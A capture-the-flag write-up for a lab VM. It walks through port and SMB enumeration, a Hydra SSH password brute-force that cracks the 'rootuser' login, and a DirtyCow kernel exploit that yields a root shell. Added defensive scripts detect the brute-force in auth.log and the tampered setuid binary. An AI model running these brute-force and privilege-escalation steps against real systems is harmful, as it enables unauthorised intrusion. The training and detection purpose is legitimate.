AdminNoobMachine2
IP: 10.0.0.14
Enumeration
# nmap -sC -sV -v -Pn 10.0.0.14
...............................
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
| 2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
| 256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_ 256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 2 disallowed entries
|_/old/ /test/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open mysql MySQL (unauthorized)
6667/tcp open irc InspIRCd
| irc-info:
| server: Admin.local
| users: 1
| servers: 1
| chans: 0
| lusers: 1
| lservers: 0
| source ident: nmap
| source host: 172.30.2.254
|_ error: Closing link: (nmap@172.30.2.254) [Client exited]
Service Info: Hosts: NOOB2, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -438d23h43m45s, deviation: 5h46m24s, median: -438d20h23m46s
| nbstat: NetBIOS name: NOOB2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| NOOB2<00> Flags: <unique><active>
| NOOB2<03> Flags: <unique><active>
| NOOB2<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: \x00
| NetBIOS computer name: NOOB2\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2020-07-16T03:31:10+10:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-07-15T17:31:10
|_ start_date: N/A
# gobuster dir -e -u http://10.0.0.14 -w /usr/share/dirb/wordlists/big.txt
===============================================================
http://10.0.0.14/.htpasswd (Status: 403) [Size: 285]
http://10.0.0.14/.htaccess (Status: 403) [Size: 285]
http://10.0.0.14/apache (Status: 301) [Size: 306] [--> http://10.0.0.14/apache/]
http://10.0.0.14/javascript (Status: 301) [Size: 310] [--> http://10.0.0.14/javascript/]
http://10.0.0.14/old (Status: 301) [Size: 303] [--> http://10.0.0.14/old/]
http://10.0.0.14/phpmyadmin (Status: 301) [Size: 310] [--> http://10.0.0.14/phpmyadmin/]
http://10.0.0.14/robots.txt (Status: 200) [Size: 48]
http://10.0.0.14/server-status (Status: 403) [Size: 289]
http://10.0.0.14/test (Status: 301) [Size: 304] [--> http://10.0.0.14/test/]
http://10.0.0.14/wordpress (Status: 301) [Size: 309] [--> http://10.0.0.14/wordpress/]
http://10.0.0.14/wp (Status: 301) [Size: 302] [--> http://10.0.0.14/wp/]
# smbclient -L \\\\10.0.0.14\\share$
Enter WORKGROUP\root's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
share$ Disk Sumshare
IPC$ IPC IPC Service (Web server)
SMB1 disabled -- no workgroup available
# smbclient -N \\\\10.0.0.14\\share$
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Jul 9 15:10:24 2020
.. D 0 Mon Aug 14 08:34:47 2017
wordpress D 0 Thu Jul 9 14:58:58 2020
wp D 0 Tue Aug 15 06:51:23 2017
robots.txt N 48 Thu Jul 9 15:02:02 2020
todolist.txt N 60 Thu Jul 9 15:03:51 2020
apache D 0 Mon Aug 14 08:35:19 2017
index.html N 2107 Thu Jul 9 15:10:02 2020
info.php N 20 Tue Aug 15 06:55:19 2017
test D 0 Mon Aug 14 08:35:10 2017
old D 0 Mon Aug 14 08:35:13 2017
The file todolist.txt contains a single line (a note to self to replace the current password with a stronger one):
http://10.0.0.14/todolist.txt - Lembrar de trocar a minha senha atual por uma mais forte!
Another relevant clue, from the page source of the WordPress directory (an HTML comment stating that the new HS blog will be developed by rootuser, followed by a "coming soon" heading):
view-source:http://10.0.0.14/wordpress/ <!-- O Novo blog da HS sera desenvolvido por rootuser --> <h1> Em breve o novo Blog da HS!!! </h1>
Exploitation
I tried to brute-force SSH with Hydra (without success):
# hydra -vV -l www-data -P /usr/share/john/password.lst -f 10.0.0.14 ssh -t4
# hydra -vV -l root -P /usr/share/john/password.lst -f 10.0.0.14 ssh -t4
# hydra -vV -l rootuser -P /usr/share/john/password.lst -f 10.0.0.14 ssh -t4
I had also made some brute-force attempts with Hydra against the phpMyAdmin service (without success):
# hydra -l rootuser -P /usr/share/john/password.lst -f -V 10.0.0.14 http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^:Username"
I finally managed to crack SSH access for the user rootuser:
# hydra -vV -l rootuser -P /usr/share/wordlists/rockyou.txt -f 10.0.0.14 ssh -t4
[22][ssh] host: 10.0.0.14 login: rootuser password: metallica1
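A defender's view of the same event, as an added example that is not part of the original write-up: the Hydra run above leaves a dense burst of "Failed password" records for one user from one source in sshd's auth.log, followed by a single "Accepted password". The script below assumes the default OpenSSH syslog format and uses constructed log lines; it flags the burst and separately marks the success-after-burst case, which is the guessed-password signature.

```python
import re
from collections import defaultdict
from datetime import datetime

# One regex for both outcomes sshd records for password authentication.
SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: a hydra-style burst, one stray guess from another host, one unrelated sshd line.
SAMPLE_LOG = """\
Jul 16 03:40:01 noob2 sshd[1201]: Failed password for rootuser from 172.30.2.254 port 40122 ssh2
Jul 16 03:40:01 noob2 sshd[1203]: Failed password for rootuser from 172.30.2.254 port 40124 ssh2
Jul 16 03:40:02 noob2 sshd[1205]: Failed password for rootuser from 172.30.2.254 port 40126 ssh2
Jul 16 03:40:02 noob2 sshd[1207]: Failed password for rootuser from 172.30.2.254 port 40128 ssh2
Jul 16 03:40:03 noob2 sshd[1209]: Failed password for rootuser from 172.30.2.254 port 40130 ssh2
Jul 16 03:40:03 noob2 sshd[1211]: Failed password for rootuser from 172.30.2.254 port 40132 ssh2
Jul 16 03:40:04 noob2 sshd[1213]: Accepted password for rootuser from 172.30.2.254 port 40134 ssh2
Jul 16 03:41:10 noob2 sshd[1220]: Failed password for invalid user admin from 10.0.0.77 port 50100 ssh2
Jul 16 03:41:11 noob2 sshd[1220]: Connection closed by 10.0.0.77 port 50100 [preauth]
""".splitlines()


def parse(lines):
    """Yield (timestamp, result, user, src) for each password-auth record; other lines are skipped."""
    for line in lines:
        m = SSHD_RE.match(line)
        if m:
            yield datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["result"], m["user"], m["src"]


def detect(lines, threshold=5, window_s=60):
    """Flag (src, user) pairs with >= threshold failures inside a sliding window of window_s seconds."""
    recent = defaultdict(list)  # (src, user) -> failure timestamps still inside the window
    alerts = {}
    for ts, result, user, src in parse(lines):
        key = (src, user)
        if result == "Failed":
            recent[key] = [t for t in recent[key] if (ts - t).total_seconds() <= window_s]
            recent[key].append(ts)
            if len(recent[key]) >= threshold:
                alert = alerts.setdefault(key, {"failures": 0, "success_after_burst": False})
                alert["failures"] = max(alert["failures"], len(recent[key]))
        elif key in alerts:
            # An accepted login right after a flagged burst: treat as compromise, not just a ban.
            alerts[key]["success_after_burst"] = True
    return alerts
```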
Post-Exploitation
This is Ubuntu 14.04.5 with kernel version 4.4:
rootuser@noob2:~$ lsb_release -a;uname -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
Linux noob2 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
Good old DirtyCow is enough:
rootuser@noob2:/tmp$ chmod +x cowroot
rootuser@noob2:/tmp$ ./cowroot
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 45420
Racing, this may take a while..
thread stopped
/usr/bin/passwd overwritten
Popping root shell.
Don't forget to restore /tmp/bak
thread stopped
root@noob2:/tmp# whoami
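The cowroot output above states the artifact a defender should look for: a setuid root binary, /usr/bin/passwd, was replaced in place. The following added example (not from the write-up) is the baseline-and-diff check over setuid binaries that catches exactly that; it runs against a constructed temporary directory rather than a real /usr/bin, and on a managed host the same comparison would normally come from package-manager file verification.

```python
import hashlib
import os
import stat
import tempfile

def sha256(path):
    with open(path, "rb") as f:
        return hashlib.sha256(f.read()).hexdigest()

def setuid_binaries(root):
    """Yield regular files under root whose mode carries the setuid bit."""
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                yield path

def baseline(root):
    """Map each setuid binary (relative to root) to its SHA-256, taken while the host is trusted."""
    return {os.path.relpath(p, root): sha256(p) for p in setuid_binaries(root)}

def audit(root, known):
    """Diff the live setuid set against the baseline; every entry returned needs a look."""
    current = baseline(root)
    return {
        "modified": sorted(k for k in known if k in current and current[k] != known[k]),
        "new_setuid": sorted(k for k in current if k not in known),
        "missing": sorted(k for k in known if k not in current),
    }

def demo():
    """Constructed scenario in a temp dir: baseline a fake passwd, then overwrite it in place."""
    root = tempfile.mkdtemp()
    bindir = os.path.join(root, "usr", "bin")
    os.makedirs(bindir)
    passwd = os.path.join(bindir, "passwd")
    with open(passwd, "wb") as f:
        f.write(b"original passwd binary")
    os.chmod(passwd, 0o4755)  # setuid root, like the real /usr/bin/passwd
    known = baseline(root)
    with open(passwd, "r+b") as f:  # same path, new contents, as cowroot's output reports
        f.write(b"popped root shell")
    # A normal VFS write strips setuid for an unprivileged writer; Dirty COW's
    # page-cache write does not, so restore the mode to mirror the real artifact.
    os.chmod(passwd, 0o4755)
    return audit(root, known)
```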